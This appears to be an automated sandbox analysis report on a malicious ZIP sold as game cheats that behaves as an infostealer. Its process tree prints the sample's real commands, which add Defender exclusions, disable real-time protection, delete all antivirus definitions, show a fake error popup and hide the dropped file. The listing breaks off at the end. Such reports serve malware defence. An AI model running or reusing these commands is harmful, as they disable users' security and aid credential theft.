1765ce123fb4118f4871d63018c48217b5584ec6d7868822123b8679c8114d88

Analysis

max time kernel
69s
max time network
65s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
21-12-2024 12:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

R6-cheats_promanners-main.zip
Size

27.6MB
MD5

dccd41267c120fca95bcadc253848616
SHA1

3dd08ef8fa1f169a4212d800a61aff822c7e98ae
SHA256

1765ce123fb4118f4871d63018c48217b5584ec6d7868822123b8679c8114d88
SHA512

03c270c140732530908173dd0fe05cdf256cf60d234f1f9e39af301b56ece7962bcfcdffd8f05d0712a217eaf7f552aa8d0277540ed939e1f87703fa5ffd9705
SSDEEP

786432:DKxfNtE48bxKmAehLxp5nGVd7htPLRQfnJjAs8JKG:DKxVtx8bomAwFnnGDhPQv2s88G

Score

10^/10

collection credential_access defense_evasion discovery evasion execution spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
4336	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2604	powershell.exe
4312	powershell.exe
1204	powershell.exe
5108	powershell.exe
2928	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Installer_patch.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2872	powershell.exe
4028	cmd.exe

Executes dropped EXE 5 IoCs

pid	Process
4664	Installer_patch.exe
4476	Installer_patch.exe
4992	rar.exe
3692	Installer.exe
2396	Installer.exe

Loads dropped DLL 17 IoCs

pid	Process
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe
4476	Installer_patch.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
49	discord.com
50	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
47	ip-api.com
35	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3824	tasklist.exe
4504	tasklist.exe
464	tasklist.exe
2828	tasklist.exe
1032	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4744	cmd.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002800000004619c-179.dat	upx
behavioral1/memory/4476-183-0x00007FFCF4950000-0x00007FFCF4DBE000-memory.dmp	upx
behavioral1/files/0x002800000004618f-186.dat	upx
behavioral1/memory/4476-188-0x00007FFCF5200000-0x00007FFCF5224000-memory.dmp	upx
behavioral1/files/0x002800000004619a-187.dat	upx
behavioral1/memory/4476-206-0x00007FFD073F0000-0x00007FFD073FF000-memory.dmp	upx
behavioral1/files/0x0028000000046196-205.dat	upx
behavioral1/files/0x0028000000046195-204.dat	upx
behavioral1/files/0x0028000000046194-203.dat	upx
behavioral1/files/0x004f000000046193-202.dat	upx
behavioral1/files/0x004f000000046192-201.dat	upx
behavioral1/files/0x004f000000046191-200.dat	upx
behavioral1/files/0x0028000000046190-199.dat	upx
behavioral1/files/0x002800000004618e-198.dat	upx
behavioral1/files/0x00280000000461a1-197.dat	upx
behavioral1/files/0x00280000000461a0-196.dat	upx
behavioral1/files/0x002800000004619f-195.dat	upx
behavioral1/files/0x002800000004619b-192.dat	upx
behavioral1/files/0x0028000000046199-191.dat	upx
behavioral1/memory/4476-212-0x00007FFCF4F00000-0x00007FFCF4F2D000-memory.dmp	upx
behavioral1/memory/4476-214-0x00007FFD04860000-0x00007FFD04879000-memory.dmp	upx
behavioral1/memory/4476-216-0x00007FFCF4F90000-0x00007FFCF4FAF000-memory.dmp	upx
behavioral1/memory/4476-218-0x00007FFCF47D0000-0x00007FFCF4941000-memory.dmp	upx
behavioral1/memory/4476-220-0x00007FFCF47B0000-0x00007FFCF47C9000-memory.dmp	upx
behavioral1/memory/4476-224-0x00007FFCF4780000-0x00007FFCF47AE000-memory.dmp	upx
behavioral1/memory/4476-223-0x00007FFD063F0000-0x00007FFD063FD000-memory.dmp	upx
behavioral1/memory/4476-232-0x00007FFCF5200000-0x00007FFCF5224000-memory.dmp	upx
behavioral1/memory/4476-237-0x00007FFCF4F00000-0x00007FFCF4F2D000-memory.dmp	upx
behavioral1/memory/4476-236-0x00007FFD05F00000-0x00007FFD05F0D000-memory.dmp	upx
behavioral1/memory/4476-235-0x00007FFD0CE50000-0x00007FFD0CE64000-memory.dmp	upx
behavioral1/memory/4476-231-0x00007FFCF4340000-0x00007FFCF46B5000-memory.dmp	upx
behavioral1/memory/4476-229-0x00007FFCF46C0000-0x00007FFCF4778000-memory.dmp	upx
behavioral1/memory/4476-228-0x00007FFCF4950000-0x00007FFCF4DBE000-memory.dmp	upx
behavioral1/memory/4476-240-0x00007FFCF4220000-0x00007FFCF4338000-memory.dmp	upx
behavioral1/memory/4476-239-0x00007FFD04860000-0x00007FFD04879000-memory.dmp	upx
behavioral1/memory/4476-261-0x00007FFCF4F90000-0x00007FFCF4FAF000-memory.dmp	upx
behavioral1/memory/4476-277-0x00007FFCF47D0000-0x00007FFCF4941000-memory.dmp	upx
behavioral1/memory/4476-327-0x00007FFCF47B0000-0x00007FFCF47C9000-memory.dmp	upx
behavioral1/memory/4476-368-0x00007FFCF4780000-0x00007FFCF47AE000-memory.dmp	upx
behavioral1/memory/4476-426-0x00007FFCF46C0000-0x00007FFCF4778000-memory.dmp	upx
behavioral1/memory/4476-429-0x00007FFCF4340000-0x00007FFCF46B5000-memory.dmp	upx
behavioral1/memory/4476-446-0x00007FFCF47D0000-0x00007FFCF4941000-memory.dmp	upx
behavioral1/memory/4476-441-0x00007FFCF5200000-0x00007FFCF5224000-memory.dmp	upx
behavioral1/memory/4476-440-0x00007FFCF4950000-0x00007FFCF4DBE000-memory.dmp	upx
behavioral1/memory/4476-445-0x00007FFCF4F90000-0x00007FFCF4FAF000-memory.dmp	upx
behavioral1/memory/4476-479-0x00007FFCF4950000-0x00007FFCF4DBE000-memory.dmp	upx
behavioral1/memory/4476-499-0x00007FFCF4F90000-0x00007FFCF4FAF000-memory.dmp	upx
behavioral1/memory/4476-504-0x00007FFCF46C0000-0x00007FFCF4778000-memory.dmp	upx
behavioral1/memory/4476-503-0x00007FFCF4780000-0x00007FFCF47AE000-memory.dmp	upx
behavioral1/memory/4476-502-0x00007FFD063F0000-0x00007FFD063FD000-memory.dmp	upx
behavioral1/memory/4476-501-0x00007FFCF47B0000-0x00007FFCF47C9000-memory.dmp	upx
behavioral1/memory/4476-500-0x00007FFCF47D0000-0x00007FFCF4941000-memory.dmp	upx
behavioral1/memory/4476-498-0x00007FFD04860000-0x00007FFD04879000-memory.dmp	upx
behavioral1/memory/4476-497-0x00007FFCF4F00000-0x00007FFCF4F2D000-memory.dmp	upx
behavioral1/memory/4476-496-0x00007FFD073F0000-0x00007FFD073FF000-memory.dmp	upx
behavioral1/memory/4476-495-0x00007FFCF5200000-0x00007FFCF5224000-memory.dmp	upx
behavioral1/memory/4476-494-0x00007FFCF4340000-0x00007FFCF46B5000-memory.dmp	upx
behavioral1/memory/4476-493-0x00007FFCF4220000-0x00007FFCF4338000-memory.dmp	upx
behavioral1/memory/4476-492-0x00007FFD05F00000-0x00007FFD05F0D000-memory.dmp	upx
behavioral1/memory/4476-491-0x00007FFD0CE50000-0x00007FFD0CE64000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3576	PING.EXE
1808	cmd.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1212	WMIC.exe
3772	WMIC.exe
4936	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2352	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000_Classes\Local Settings	taskmgr.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3576	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
224	WMIC.exe
224	WMIC.exe
224	WMIC.exe
224	WMIC.exe
5108	powershell.exe
5108	powershell.exe
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe
5108	powershell.exe
4936	WMIC.exe
4936	WMIC.exe
4936	WMIC.exe
4936	WMIC.exe
1212	WMIC.exe
1212	WMIC.exe
1212	WMIC.exe
1212	WMIC.exe
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
4916	WMIC.exe
4916	WMIC.exe
4916	WMIC.exe
4916	WMIC.exe
2872	powershell.exe
2872	powershell.exe
2400	powershell.exe
2400	powershell.exe
2872	powershell.exe
2400	powershell.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
3732	powershell.exe
3732	powershell.exe
3732	powershell.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
5112	WMIC.exe
5112	WMIC.exe
5112	WMIC.exe
5112	WMIC.exe
5100	WMIC.exe
5100	WMIC.exe
5100	WMIC.exe
5100	WMIC.exe
4336	WMIC.exe
4336	WMIC.exe
4336	WMIC.exe
4336	WMIC.exe
456	taskmgr.exe
1204	powershell.exe
1204	powershell.exe
1204	powershell.exe
3772	WMIC.exe
3772	WMIC.exe
3772	WMIC.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1448	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1448	7zFM.exe
Token: 35	1448	7zFM.exe
Token: SeSecurityPrivilege	1448	7zFM.exe
Token: SeRestorePrivilege	1168	7zG.exe
Token: 35	1168	7zG.exe
Token: SeSecurityPrivilege	1168	7zG.exe
Token: SeSecurityPrivilege	1168	7zG.exe
Token: SeIncreaseQuotaPrivilege	224	WMIC.exe
Token: SeSecurityPrivilege	224	WMIC.exe
Token: SeTakeOwnershipPrivilege	224	WMIC.exe
Token: SeLoadDriverPrivilege	224	WMIC.exe
Token: SeSystemProfilePrivilege	224	WMIC.exe
Token: SeSystemtimePrivilege	224	WMIC.exe
Token: SeProfSingleProcessPrivilege	224	WMIC.exe
Token: SeIncBasePriorityPrivilege	224	WMIC.exe
Token: SeCreatePagefilePrivilege	224	WMIC.exe
Token: SeBackupPrivilege	224	WMIC.exe
Token: SeRestorePrivilege	224	WMIC.exe
Token: SeShutdownPrivilege	224	WMIC.exe
Token: SeDebugPrivilege	224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	224	WMIC.exe
Token: SeRemoteShutdownPrivilege	224	WMIC.exe
Token: SeUndockPrivilege	224	WMIC.exe
Token: SeManageVolumePrivilege	224	WMIC.exe
Token: 33	224	WMIC.exe
Token: 34	224	WMIC.exe
Token: 35	224	WMIC.exe
Token: 36	224	WMIC.exe
Token: SeDebugPrivilege	1032	tasklist.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeIncreaseQuotaPrivilege	224	WMIC.exe
Token: SeSecurityPrivilege	224	WMIC.exe
Token: SeTakeOwnershipPrivilege	224	WMIC.exe
Token: SeLoadDriverPrivilege	224	WMIC.exe
Token: SeSystemProfilePrivilege	224	WMIC.exe
Token: SeSystemtimePrivilege	224	WMIC.exe
Token: SeProfSingleProcessPrivilege	224	WMIC.exe
Token: SeIncBasePriorityPrivilege	224	WMIC.exe
Token: SeCreatePagefilePrivilege	224	WMIC.exe
Token: SeBackupPrivilege	224	WMIC.exe
Token: SeRestorePrivilege	224	WMIC.exe
Token: SeShutdownPrivilege	224	WMIC.exe
Token: SeDebugPrivilege	224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	224	WMIC.exe
Token: SeRemoteShutdownPrivilege	224	WMIC.exe
Token: SeUndockPrivilege	224	WMIC.exe
Token: SeManageVolumePrivilege	224	WMIC.exe
Token: 33	224	WMIC.exe
Token: 34	224	WMIC.exe
Token: 35	224	WMIC.exe
Token: 36	224	WMIC.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeIncreaseQuotaPrivilege	5108	powershell.exe
Token: SeSecurityPrivilege	5108	powershell.exe
Token: SeTakeOwnershipPrivilege	5108	powershell.exe
Token: SeLoadDriverPrivilege	5108	powershell.exe
Token: SeSystemProfilePrivilege	5108	powershell.exe
Token: SeSystemtimePrivilege	5108	powershell.exe
Token: SeProfSingleProcessPrivilege	5108	powershell.exe
Token: SeIncBasePriorityPrivilege	5108	powershell.exe
Token: SeCreatePagefilePrivilege	5108	powershell.exe
Token: SeBackupPrivilege	5108	powershell.exe
Token: SeRestorePrivilege	5108	powershell.exe
Token: SeShutdownPrivilege	5108	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1448	7zFM.exe
1448	7zFM.exe
1168	7zG.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
456	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe
4356	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4664 wrote to memory of 4476	4664	Installer_patch.exe	98
PID 4664 wrote to memory of 4476	4664	Installer_patch.exe	98
PID 4476 wrote to memory of 928	4476	Installer_patch.exe	100
PID 4476 wrote to memory of 928	4476	Installer_patch.exe	100
PID 4476 wrote to memory of 2000	4476	Installer_patch.exe	101
PID 4476 wrote to memory of 2000	4476	Installer_patch.exe	101
PID 4476 wrote to memory of 2280	4476	Installer_patch.exe	102
PID 4476 wrote to memory of 2280	4476	Installer_patch.exe	102
PID 4476 wrote to memory of 1780	4476	Installer_patch.exe	105
PID 4476 wrote to memory of 1780	4476	Installer_patch.exe	105
PID 4476 wrote to memory of 3084	4476	Installer_patch.exe	108
PID 4476 wrote to memory of 3084	4476	Installer_patch.exe	108
PID 928 wrote to memory of 5108	928	cmd.exe	110
PID 928 wrote to memory of 5108	928	cmd.exe	110
PID 1780 wrote to memory of 1032	1780	cmd.exe	111
PID 1780 wrote to memory of 1032	1780	cmd.exe	111
PID 3084 wrote to memory of 224	3084	cmd.exe	112
PID 3084 wrote to memory of 224	3084	cmd.exe	112
PID 2280 wrote to memory of 1376	2280	cmd.exe	113
PID 2280 wrote to memory of 1376	2280	cmd.exe	113
PID 2000 wrote to memory of 2604	2000	cmd.exe	114
PID 2000 wrote to memory of 2604	2000	cmd.exe	114
PID 4476 wrote to memory of 460	4476	Installer_patch.exe	140
PID 4476 wrote to memory of 460	4476	Installer_patch.exe	140
PID 460 wrote to memory of 5072	460	cmd.exe	118
PID 460 wrote to memory of 5072	460	cmd.exe	118
PID 4476 wrote to memory of 3088	4476	Installer_patch.exe	119
PID 4476 wrote to memory of 3088	4476	Installer_patch.exe	119
PID 3088 wrote to memory of 1148	3088	cmd.exe	121
PID 3088 wrote to memory of 1148	3088	cmd.exe	121
PID 4476 wrote to memory of 3356	4476	Installer_patch.exe	122
PID 4476 wrote to memory of 3356	4476	Installer_patch.exe	122
PID 3356 wrote to memory of 4936	3356	cmd.exe	124
PID 3356 wrote to memory of 4936	3356	cmd.exe	124
PID 4476 wrote to memory of 3424	4476	Installer_patch.exe	162
PID 4476 wrote to memory of 3424	4476	Installer_patch.exe	162
PID 3424 wrote to memory of 1212	3424	cmd.exe	127
PID 3424 wrote to memory of 1212	3424	cmd.exe	127
PID 4476 wrote to memory of 4744	4476	Installer_patch.exe	128
PID 4476 wrote to memory of 4744	4476	Installer_patch.exe	128
PID 4476 wrote to memory of 2244	4476	Installer_patch.exe	130
PID 4476 wrote to memory of 2244	4476	Installer_patch.exe	130
PID 4744 wrote to memory of 2704	4744	cmd.exe	132
PID 4744 wrote to memory of 2704	4744	cmd.exe	132
PID 2244 wrote to memory of 2928	2244	cmd.exe	133
PID 2244 wrote to memory of 2928	2244	cmd.exe	133
PID 4476 wrote to memory of 4756	4476	Installer_patch.exe	134
PID 4476 wrote to memory of 4756	4476	Installer_patch.exe	134
PID 4476 wrote to memory of 1292	4476	Installer_patch.exe	135
PID 4476 wrote to memory of 1292	4476	Installer_patch.exe	135
PID 1292 wrote to memory of 3824	1292	cmd.exe	138
PID 1292 wrote to memory of 3824	1292	cmd.exe	138
PID 4756 wrote to memory of 4504	4756	cmd.exe	139
PID 4756 wrote to memory of 4504	4756	cmd.exe	139
PID 4476 wrote to memory of 460	4476	Installer_patch.exe	140
PID 4476 wrote to memory of 460	4476	Installer_patch.exe	140
PID 4476 wrote to memory of 4028	4476	Installer_patch.exe	187
PID 4476 wrote to memory of 4028	4476	Installer_patch.exe	187
PID 4476 wrote to memory of 2040	4476	Installer_patch.exe	143
PID 4476 wrote to memory of 2040	4476	Installer_patch.exe	143
PID 4476 wrote to memory of 2804	4476	Installer_patch.exe	145
PID 4476 wrote to memory of 2804	4476	Installer_patch.exe	145
PID 4476 wrote to memory of 2132	4476	Installer_patch.exe	148
PID 4476 wrote to memory of 2132	4476	Installer_patch.exe	148

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2704	attrib.exe
3576	attrib.exe
2348	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\R6-cheats_promanners-main.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1448

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4672

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer\" -spe -an -ai#7zMap24217:128:7zEvent16721
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1168

C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe
"C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4664
- C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe
  "C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2604
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The installer has been updated. Try again later.', 0, 'Patch already installed', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2280
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The installer has been updated. Try again later.', 0, 'Patch already installed', 0+16);close()"
      4⤵
      PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:460
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3088
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Windows\system32\attrib.exe
